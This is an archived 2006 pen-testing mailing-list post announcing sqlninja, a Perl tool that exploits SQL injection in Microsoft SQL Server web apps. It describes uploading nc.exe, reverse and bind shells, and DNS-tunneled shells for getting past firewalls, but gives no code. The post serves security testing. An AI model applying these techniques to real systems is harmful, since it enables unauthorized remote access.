From: A.R. (r00t@northernfortress.net)
Date: Fri Jun 23 2006 - 19:33:29 EDT
Hello fellow pen-testers,
a first version of sqlninja has been released at the address
http://sqlninja.sourceforge.net
sqlninja is a little toy that has been coded during a couple of
pen-tests we lately did and it is aimed to exploit SQL Injection
vulnerabilities on web applications that use Microsoft SQL Server as
their back-end.
It borrows some ideas from similar tools like bobcat, but it is more
targeted in providing a remote shell even with paranoid firewall
settings.
It is written in perl and runs on UNIX-like boxes.
Here's a list of what it does so far:
- Upload of nc.exe (or any other executable) using the good ol' debug
script trick
- TCP/UDP portscan from the target SQL Server to the attacking machine,
in order to find a port that is allowed by the firewall of the target
network and use it for a reverse shell
- Direct and reverse bindshell, both TCP and UDP
- DNS-tunneled pseudoshell, when no TCP/UDP ports are available for a
direct/reverse shell, but the DB server can resolve external hostnames
Being an alpha version and since it was originally supposed to be just a
quick&dirty toy for a pentest, there are lots of bugs waiting to be
found and fixed so go ahead and download it ! :)
More tunneling options (e.g.: HTTP, SMTP, ...) will be added in the
future together with tunnel encryption, but I hope you will find the
tool helpful already
Enjoy !
-- icesurfer
-- Show me a man who lives alone and has a perpetually clean kitchen, and 8 times out of 9 I'll show you a man with detestable spiritual qualities. -- Charles Bukowski ------------------------------------------------------------------------------ This List Sponsored by: Cenzic Concerned about Web Application Security? Why not go with the #1 solution - Cenzic, the only one to win the Analyst's Choice Award from eWeek. As attacks through web applications continue to rise, you need to proactively protect your applications from hackers. Cenzic has the most comprehensive solutions to meet your application security penetration testing and vulnerability management needs. You have an option to go with a managed service (Cenzic ClickToSecure) or an enterprise software (Cenzic Hailstorm). Download FREE whitepaper on how a managed service can help you: http://www.cenzic.com/news_events/wpappsec.php And, now for a limited time we can do a FREE audit for you to confirm your results from other product. Contact us at request@cenzic.com for details. ------------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:56:10 EDT